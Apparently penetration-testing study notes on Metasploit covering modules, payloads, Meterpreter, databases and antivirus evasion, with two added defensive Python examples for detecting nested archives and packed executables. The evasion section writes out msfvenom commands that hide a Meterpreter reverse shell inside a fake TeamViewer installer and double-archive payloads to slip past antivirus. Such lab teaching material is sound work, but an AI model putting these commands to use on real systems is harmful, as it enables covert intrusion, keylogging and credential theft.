Metasploit Framework
A Ruby-based pen testing platform that allows you to write, test and execute exploits for various systems. By default all files reside in /usr/share/metasploit-framework
MSF Engagement Structure
Divided into five categories
Enumeration
Preparation
Exploitation
Privilege Escalation
Post Exploitation

Starting Up
We can run msfconsole to start Metasploit.
-q : Quiet option, starts without the banner
Modules
These are split into categories. They consist of exploits, i.e. proof-of-concept (POC) code that can be used to exploit common vulnerabilities in an automated manner.
There are many types of modules, including:
Auxiliary - Scanning, fuzzing
Exploits - Exploit a vulnerability
Post - Gather information and pivot deeper
Encoders - Ensure payloads arrive intact at their destination
etc.
We can search for a module and then use it by using:
search <name>
search <name> type:<exploit-type>
use <module-name>
use <module-number>
We can see more about the selected module with the info command.
Once happy we can use show options to see all required parameters, and then set them with set <option> xxxxx
For example:
set RHOSTS 10.10.xx.x
setg RHOSTS 10.10.xx.x - sets the value globally so it persists until the program is closed
Targets
Unique OS identifiers are taken from the version of the OS that is selected for the exploit module. The show targets command displays all vulnerable targets for the selected module.
show targets
Available targets:
Id Name
-- ----
0 Automatic
1 IE 7 on Windows XP SP3
2 IE 8 on Windows XP SP3
3 IE 7 on Windows Vista
4 IE 8 on Windows Vista
5 IE 8 on Windows 7
6 IE 9 on Windows 7
set target 2
Payloads
Sent with the exploit, typically to return a reverse connection to the attacker and establish a foothold.
Singles
Contain the exploit and shellcode. Designed to be more stable and self-contained.
Stagers
Small and reliable, they are used to perform a specific task: setting up a network connection between the attacker and victim. The stager waits on the attacker machine, ready to connect to the victim host once the stage is complete. Metasploit will try the best payload and then revert to another one if necessary.
Stages
Payload components that are downloaded through a stager. They provide advanced features with no size limits, such as Meterpreter, and automatically use middle stagers.
Staged
Exploitation process that is modularized into different functions. Ultimately grants an attacker remote access to a machine if the stages work correctly.
Stage0
The initial shellcode is sent over the network to the target which will connect back to our machine if successful. Common names include
reverse_tcp
reverse_https
bind_tcp
Stage1
Meterpreter Payload
Resides completely in the memory of the remote host, meaning no trace is left behind, which makes it very hard to detect.
Once the payload is executed a new session is created, spawning a Meterpreter interface. This lets us load plugins and offers us a host of options against the target:
show payloads
grep <payload-name> show payloads : for more control over the search
set payload <payload>
Encoders
Make payloads compatible with different processor architectures and can help avoid anti-virus detection.
show encoders
msfvenom -a x86 --platform windows -p <PAYLOAD> LHOST=xxx LPORT=xxx -b "\x00" -f perl -e x86/shikata_ga_nai
We can use msf-virustotal with an API key to analyze our payloads.
msf-virustotal -k <API-key> -f exp.exe
Databases
Used to store all our results from entry points, issues and discovered credentials to name but a few. We can manage all the hosts we have analyzed.
The databases can also both be exported and imported.
First, make sure the DB is set up
sudo service postgresql status
Then start the service
sudo systemctl start postgresql
Now we can create a new DB
sudo msfdb init
Check to see the status of the current DB
sudo msfdb status
Finally, we can start msfconsole and connect to the DB
sudo msfdb run
Workspaces
Like folders in a project, we can use them to sort results of scans, hosts and other information, like extracted IPs, subnets, networks or domains.
workspace
workspace -a : add
workspace -d : delete
workspace -a Target_1
Importing scan results
db_import <scan.nmap>
If we run hosts we can see a table of host IP addresses, OS and other options
If we run services we can see a table of all the services by port and name
db_nmap -sV -sS <IP>
Data Backup
db_export -f xml backup.xml
Credentials
Shows all credentials gathered from the target. We can also add credentials manually.
creds
creds -h
Loot
Shows all loot (hash dumps, passwords, shadow files)
loot
Plugins
Allow us more flexibility using the msfconsole, as they can be loaded in to provide us with extra functionality during an assessment.
We can download and install new plugins, for example, the DarkOperator Plugin suite:
git clone https://github.com/darkoperator/Metasploit-Plugins
sudo cp ./Metasploit-Plugins/pentest.rb /usr/share/metasploit-framework/plugins/pentest.rb
A list of useful ones:
load nessus
load mimikatz
load railgun
load priv
Tools
Command line utilities that can be called from the msfconsole menu
Sessions
Msfconsole can manage multiple modules at once and this means we can have many sessions and switch between them as we wish.
sessions : Lists all active sessions
sessions -i <session-num> : Loads session by number
bg : Background the current session
Some modules will require a session to be set as a parameter
Jobs
We use this to look at currently active tasks running in the background and can terminate old ones to free up ports.
jobs
exploit -j : Runs exploit as a background job
jobs -l : Lists running jobs
Meterpreter
Looking at system processes
Network configurations
Taking screenshots
Capturing keystrokes
Taking over the victim's web camera
Helpful commands:
getsystem = Attempts to elevate privileges on the system
hashdump = Dumps contents of the SAM database
? = Help command
upload / download = Uploads / downloads a file
It is stealthy to use: not only does it reside in memory and write nothing to the disk, it now uses encryption (AES) to ensure the confidentiality of data.
We can search, use and configure our exploit and payload as shown in the above sections.
Be aware that, due to permissions, if we upload something as a payload we may not be able to remove it from the target, leaving evidence that the target was compromised!
Writing and Importing Modules
If we find we are missing a certain module we can download it from Exploit-DB:
searchsploit <exploit-name>
searchsploit -t <exploit-name> --exclude="<.ext>"
FILENAME => x.rb
cp ~/Downloads/x.rb /usr/share/metasploit-framework/modules/exploits/unix/webapp/x.rb
msfconsole -m /usr/share/metasploit-framework/modules/
loadpath /usr/share/metasploit-framework/modules/
reload_all
Msfvenom
We can use Ncat as our listener or get a Meterpreter shell by using Metasploit, as shown below.

Once we've got a shell we can run
run post/multi/recon/local_exploit_suggester
This will give some suggestions on how to exploit the machine further.
We can also search for an exploit suggester outside of the session
search local exploit suggester
Firewall and IDS/IPS Evasion
Endpoint Protection
Refers to a localized device whose purpose is to protect a single host. Usually antivirus or anti-malware protection, a firewall and anti-DDoS come in one package, e.g.
BitDefender
Malwarebytes
Perimeter Protection
A physical or virtual device on the network perimeter edge. They provide access inside of a network from the outside (public to private).
Evasion Techniques
Most AVs rely on signature-based detection to detect malicious code inside of software. When unknown software is detected by AV software it is quarantined.
Embedding
We can use msfvenom to embed a payload inside of a legitimate .exe file. This hides the payload shellcode deep inside the software, lowering our detection chances.
Let's do this with TeamViewer_Setup.exe
msfvenom -p windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 -k -x ~/Downloads/TeamViewer_Setup.exe -e x86/shikata_ga_nai -a x86 --platform windows -o ~/Desktop/TeamViewer_Setup.exe -i 5
Archives
Archiving a file, script, folder, executable, picture or any other content can help bypass AV scanning.
msfvenom -p windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 -k -e x86/shikata_ga_nai -a x86 --platform windows -o ~/test.js -i 5
Archiving it twice will lead to even lower detection rates from AVs
wget https://www.rarlab.com/rar/rarlinux-x64-612.tar.gz
tar -xzvf rarlinux-x64-612.tar.gz && cd rar
rar a ~/test.rar -p ~/test.js
Remove the .rar extension
mv test.rar test
Archive the payload again
rar a test2.rar -p test
Remove the .rar extension again
mv test2.rar test2
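The other side of the archiving trick above is file triage that does not trust names. The following is an added example, not part of these notes: it identifies files by magic bytes, flags a PE written out as .js, an archive with its extension stripped, and archives nested inside archives. It uses only the standard library, so ZIP stands in for RAR when unpacking (RAR is recognised but not opened); all sample inputs are constructed.

```python
import io
import os
import zipfile

# Leading-byte signatures of the container and executable types in play.
MAGIC = {
    "rar": (b"Rar!\x1a\x07\x00", b"Rar!\x1a\x07\x01\x00"),  # RAR4, RAR5
    "zip": (b"PK\x03\x04",),
    "pe": (b"MZ",),                                          # Windows executable
}
# Extensions under which each real type is legitimately seen.
EXPECTED = {"rar": {".rar"}, "zip": {".zip"}, "pe": {".exe", ".dll"}}

def sniff(data: bytes) -> str:
    """Identify a blob by its magic bytes instead of trusting its name."""
    for kind, sigs in MAGIC.items():
        if data.startswith(sigs):
            return kind
    return "unknown"

def scan(name: str, data: bytes, depth: int = 0, max_depth: int = 3) -> list:
    """Flag name/content mismatches and archives-in-archives, recursing into ZIPs."""
    findings = []
    kind = sniff(data)
    ext = os.path.splitext(name)[1].lower()
    if kind != "unknown" and ext not in EXPECTED[kind]:
        findings.append(f"{name}: {kind} content behind extension {ext or '<none>'}")
    if kind in ("zip", "rar") and depth > 0:
        findings.append(f"{name}: archive nested at depth {depth}")
    if kind == "zip" and depth >= max_depth:
        findings.append(f"{name}: nesting exceeds {max_depth}, not unpacked")
    elif kind == "zip":
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for member in zf.infolist():
                findings += scan(f"{name}/{member.filename}", zf.read(member), depth + 1, max_depth)
    return findings

def build_sample() -> dict:
    """Constructed inputs mirroring the steps above (ZIP stands in for RAR)."""
    fake_pe = b"MZ" + b"\x00" * 62                 # stand-in for a PE saved as test.js
    inner, outer = io.BytesIO(), io.BytesIO()
    with zipfile.ZipFile(inner, "w") as zf:
        zf.writestr("test.js", fake_pe)
    with zipfile.ZipFile(outer, "w") as zf:
        zf.writestr("test", inner.getvalue())      # first archive, extension stripped
    return {"test2": outer.getvalue(),             # second archive, extension stripped
            "notes.rar": b"Rar!\x1a\x07\x01\x00" + b"\x00" * 8}  # correctly named
```

Running scan over build_sample() yields four findings for test2 (two stripped extensions, one nested archive, one PE behind .js) and none for notes.rar.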
Packers
Executable compression process where the payload is packed together with an .exe program and the decompression code in one file. When run, the decompression code restores the backdoored executable to its initial state, allowing for an even higher chance of evading AVs. Common packers include:
UPX packer
MPRESS
MEW
ExeStealth
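From the defender's side, packed executables leave structural traces that a scanner can check before any signature match. The following is an added example, not from these notes: a minimal PE section-table walker applying three common packer heuristics (known section names, a section that is empty on disk but large in memory, high-entropy section bodies). Only UPX and MPRESS section names are listed because those markers are well known; MEW and ExeStealth are omitted. The sample PE is constructed with a UPX-style layout and is not a real binary.

```python
import math
import struct

# Section names the packers mentioned above leave behind (UPX, MPRESS).
PACKER_SECTIONS = {"UPX0": "UPX", "UPX1": "UPX", "UPX2": "UPX",
                   ".MPRESS1": "MPRESS", ".MPRESS2": "MPRESS"}

def entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte; compressed or encrypted data sits near 8."""
    probs = [data.count(bytes([b])) / len(data) for b in set(data)]
    return -sum(p * math.log2(p) for p in probs)

def sections(pe: bytes) -> list:
    """Walk the PE section table, returning (name, virtual_size, raw_size, raw_ptr)."""
    if pe[:2] != b"MZ" or len(pe) < 0x40:
        raise ValueError("not a PE file")
    pe_off = struct.unpack_from("<I", pe, 0x3C)[0]           # e_lfanew
    if pe[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    # COFF header: Machine, NumberOfSections, ..., SizeOfOptionalHeader, Characteristics
    _m, nsec, _ts, _sym, _nsym, opt_size, _ch = struct.unpack_from("<HHIIIHH", pe, pe_off + 4)
    table = pe_off + 24 + opt_size                            # first section header
    out = []
    for i in range(nsec):
        name, vsize, _vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", pe, table + i * 40)
        out.append((name.rstrip(b"\0").decode("ascii", "replace"), vsize, rawsize, rawptr))
    return out

def packer_indicators(pe: bytes) -> list:
    """Packer section names, empty-on-disk unpack target, high-entropy bodies."""
    hits = []
    for name, vsize, rawsize, rawptr in sections(pe):
        if name in PACKER_SECTIONS:
            hits.append(f"{name}: {PACKER_SECTIONS[name]} section name")
        if rawsize == 0 and vsize > 0:
            hits.append(f"{name}: 0 bytes on disk, {vsize:#x} bytes in memory")
        body = pe[rawptr:rawptr + rawsize]
        if rawsize >= 256 and entropy(body) > 7.0:
            hits.append(f"{name}: entropy {entropy(body):.2f} (compressed data)")
    return hits

def build_sample() -> bytes:
    """Constructed minimal PE with a UPX-style layout; optional header omitted (size 0)."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)          # e_lfanew = 64
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0, 0)
    body = bytes(range(256)) * 2                               # max-entropy stand-in
    hdr = "<8sIIIIIIHHI"                                       # 40-byte section header
    upx0 = struct.pack(hdr, b"UPX0", 0x10000, 0x1000, 0, 0, 0, 0, 0, 0, 0)
    upx1 = struct.pack(hdr, b"UPX1", 0x4000, 0x11000, len(body), 168, 0, 0, 0, 0, 0)
    return dos + coff + upx0 + upx1 + body                     # body starts at offset 168
```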